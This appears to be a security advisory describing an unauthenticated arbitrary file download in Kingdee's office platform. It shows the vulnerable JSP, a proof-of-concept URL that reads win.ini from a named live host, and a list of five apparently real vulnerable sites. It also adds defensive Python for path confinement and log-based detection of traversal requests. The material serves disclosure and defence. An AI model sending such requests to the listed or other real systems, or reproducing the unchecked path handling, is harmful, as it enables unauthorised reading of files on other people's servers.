Kingdee Collaborative Office Platform arbitrary file download vulnerability (no login required)

2015-08-04T00:00:00
ID SSV:93827
Type seebug
Reporter Root
Modified 2015-08-04T00:00:00

Description

Summary:

Kingdee Collaborative Office Platform arbitrary file download vulnerability (no login required)

Details:

Testing shows that the system has an arbitrary file download vulnerability, and it is reachable without logging in. The vulnerable file is:

/oa/admin/application/file_download.jsp?filePath=

Part of the vulnerable code:

```jsp
<%@ page import="java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%>
<%
    // filePath is taken straight from the request. It defaults to a Tomcat log,
    // but any path the Tomcat process can read is accepted unchanged.
    String logPath = request.getParameter("filePath")==null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath");
    // contentType and fileName are also caller-controlled and are reflected
    // into the response headers as-is.
    String contentType = request.getParameter("contentType")==null?"application/x-download":request.getParameter("contentType");
    String fileName = request.getParameter("fileName")==null?"file.txt":request.getParameter("fileName");
    java.io.OutputStream ou = null;
    java.io.InputStream is = null;
    try{
        // No authentication, no canonicalisation, no base-directory check:
        // the only condition for streaming the file is that it exists.
        java.io.File logFile = new java.io.File(logPath);
        if (logFile.exists()) {
            is = new java.io.FileInputStream(logPath);
            byte[] content = new byte[1024];
            int i = 0;
            response.setContentType(contentType);
            ou = response.getOutputStream();
            response.setHeader("Content-Disposition", "attachment; filename=\""+fileName+"\"");
            while ((i = is.read(content)) != -1) {
                ou.write(content, 0, i);
            }
            ou.flush();
        } else {
            // A missing file is reported back together with the requested path.
            out.println("file not found:"+logPath);
        }
    } catch (Exception e) {
        System.out.println(e);
    } finally {
        if (ou != null) ou.close();
        if (is != null) is.close();
    }
%>
```
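The checks the JSP above omits, as an added example rather than Kingdee's code: the page hands the raw filePath to java.io.File, so a fix has to confine every request to one download directory and validate the result after canonicalisation. The Python below does that for a hypothetical log directory (the root and the sample log file are constructed for the demo) and also sanitises the caller-controlled fileName before it is reflected into Content-Disposition. The page shows no vendor fix; this is the logic a patched file_download.jsp would need to carry.

```python
"""Confine a user-supplied download path to one directory.

Added illustration, not Kingdee's code.  These are the checks the JSP
above omits, written in Python so they can be run stand-alone.  The
download root and the log file used by demo() are constructed for the
demo; a real deployment would point at the Tomcat logs directory.
"""
import os
import re
import tempfile


class PathRejected(ValueError):
    """Raised when a requested path may not be served."""


def resolve_download_path(root: str, requested: str) -> str:
    """Return an absolute path under `root` for `requested`, or raise.

    Order matters: refuse absolute paths and drive letters outright,
    refuse any '..' component, resolve the remainder relative to `root`
    (following symlinks), and only then confirm the result is still
    inside `root`.  The JSP does none of this and opens the raw string.
    """
    if not requested or "\x00" in requested:
        raise PathRejected("empty path or embedded NUL")
    # Treat backslashes as separators on every platform so the check
    # behaves the same on a Linux test box as on the Windows host the
    # advisory's default path (D:\KingdeeOA\...) implies.
    normalised = requested.replace("\\", "/")
    if re.match(r"^[A-Za-z]:", normalised) or normalised.startswith("/"):
        raise PathRejected("absolute path not allowed: %r" % requested)
    if ".." in normalised.split("/"):
        raise PathRejected("parent-directory traversal: %r" % requested)
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, normalised))
    # Containment check after realpath catches symlinks under root that
    # point outside it.
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PathRejected("path escapes download root: %r" % requested)
    if not os.path.isfile(candidate):
        raise PathRejected("not a regular file: %r" % requested)
    return candidate


def safe_attachment_filename(name: str, default: str = "file.txt") -> str:
    """Sanitise the caller-controlled fileName before it is reflected into
    Content-Disposition: keep the last path component, cut at the first
    CR/LF (header injection), and drop quotes, control characters and
    semicolons that could break out of the quoted filename."""
    base = re.split(r"[\\/]", name or "")[-1]
    base = re.split(r"[\r\n]", base)[0]
    cleaned = re.sub(r'["\x00-\x1f;]', "", base).strip()
    return cleaned or default


def demo() -> dict:
    """Create a scratch log directory and run requests in the style of the
    advisory through the check.  Returns {request: basename | 'REJECTED'}."""
    root = tempfile.mkdtemp(prefix="oa-logs-")
    with open(os.path.join(root, "catalina.log"), "w") as fh:
        fh.write("constructed log line\n")  # constructed sample content
    requests = [
        "catalina.log",              # legitimate: a log in the directory
        "c:\\windows\\win.ini",      # the advisory's proof of concept
        "/etc/passwd",               # same idea on a Unix host
        "..\\..\\conf\\server.xml",  # traversal towards Tomcat's config
        "sub/../catalina.log",       # would normalise fine, still refused
    ]
    outcomes = {}
    for req in requests:
        try:
            outcomes[req] = os.path.basename(resolve_download_path(root, req))
        except PathRejected:
            outcomes[req] = "REJECTED"
    return outcomes


if __name__ == "__main__":
    for req, result in demo().items():
        print("%-28r -> %s" % (req, result))
```

Rejecting any `..` component before normalisation is deliberately stricter than a pure containment check: a request that needs `..` to reach a file under the log directory has no legitimate reason to exist, and refusing it early keeps the realpath step from ever touching paths outside the root. Fixing the path alone does not address the other finding on the page, which is that the endpoint needs no session at all; that has to be enforced separately.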

This is an obvious arbitrary file download. Taking an arbitrary instance found online to demonstrate it:

http://oa.xpngs.com/oa/admin/application/file_download.jsp?filePath=c:\windows\win.ini

Requesting this URL directly downloads the file; it is saved as file.txt, the default value of the fileName parameter (the contentType parameter likewise defaults to application/x-download, and both are taken from the request).

<img src="https://images.seebug.org/upload/201508/03215140d50cc7e1216f834cd627296221c9e8ad.png" alt="1.png" width="600">
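For anyone looking for exploitation of this endpoint after the fact, an added example (not from the advisory) that scans Tomcat access-log lines for requests to file_download.jsp whose filePath is absolute or contains traversal. The log lines are constructed in Tomcat's common log format with the advisory's win.ini request among them; the client addresses, timestamps and byte counts are made up.

```python
"""Flag exploitation attempts against file_download.jsp in Tomcat access logs.

Added example, not part of the advisory.  SAMPLE_LOG is constructed in
Tomcat's common log format; the client addresses, timestamps and sizes are
made up, and the request URLs follow the advisory.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/oa/admin/application/file_download.jsp"

SAMPLE_LOG = """\
10.0.0.5 - - [03/Aug/2015:21:50:12 +0800] "GET /oa/admin/application/file_download.jsp?filePath=c:\\windows\\win.ini HTTP/1.1" 200 403
10.0.0.5 - - [03/Aug/2015:21:50:40 +0800] "GET /oa/admin/application/file_download.jsp?filePath=..%2F..%2Fconf%2Fserver.xml HTTP/1.1" 200 5201
10.0.0.9 - - [03/Aug/2015:21:51:02 +0800] "GET /oa/admin/application/file_download.jsp?filePath=catalina.2015-08-03.log HTTP/1.1" 200 88211
10.0.0.7 - - [03/Aug/2015:21:51:30 +0800] "GET /oa/themes/mskin/login/login.jsp HTTP/1.1" 200 3120
10.0.0.5 - - [03/Aug/2015:21:52:01 +0800] "GET /oa/admin/application/file_download.jsp?filePath=%2Fetc%2Fpasswd&fileName=p.txt HTTP/1.1" 404 60
"""

# Common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)'
)


def classify_file_path(value: str) -> Optional[str]:
    """Explain why a filePath value looks like an attempt to read outside
    the intended log directory, or return None for a plain file name."""
    # Decode twice to catch double-encoded traversal, then unify separators.
    decoded = unquote(unquote(value)).replace("\\", "/")
    if re.match(r"^[A-Za-z]:", decoded):
        return "absolute windows path"
    if decoded.startswith("/"):
        return "absolute unix path"
    if ".." in decoded.split("/"):
        return "directory traversal"
    return None


def flag_requests(log_text: str) -> List[Dict[str, object]]:
    """Return one record per suspicious filePath seen on the endpoint.
    Status and size are kept: a 200 with a non-trivial byte count means the
    file was actually served, a 404 only that the path was probed."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != ENDPOINT:
            continue
        # parse_qs already percent-decodes the values once.
        for value in parse_qs(url.query).get("filePath", []):
            reason = classify_file_path(value)
            if reason:
                hits.append({
                    "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
                    "bytes": m["bytes"], "filePath": value, "reason": reason,
                })
    return hits


if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

Because the endpoint needs no login, every hit on it from outside the administrators' network is worth reviewing, not only the ones this classifier flags; the classifier only separates the plainly hostile paths from downloads of a file name inside the log directory.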

Five cases:

http://oa.xpngs.com/oa/themes/mskin/login/login.jsp
http://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsp
http://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsp
http://113.106.196.36:7890/oa/themes/mskin/login/login.jsp?login_error=quit
http://www.jrxoa.com/oa/themes/mskin/login/login.jsp

Proof of vulnerability:

The downloaded file is shown in the screenshot above (1.png).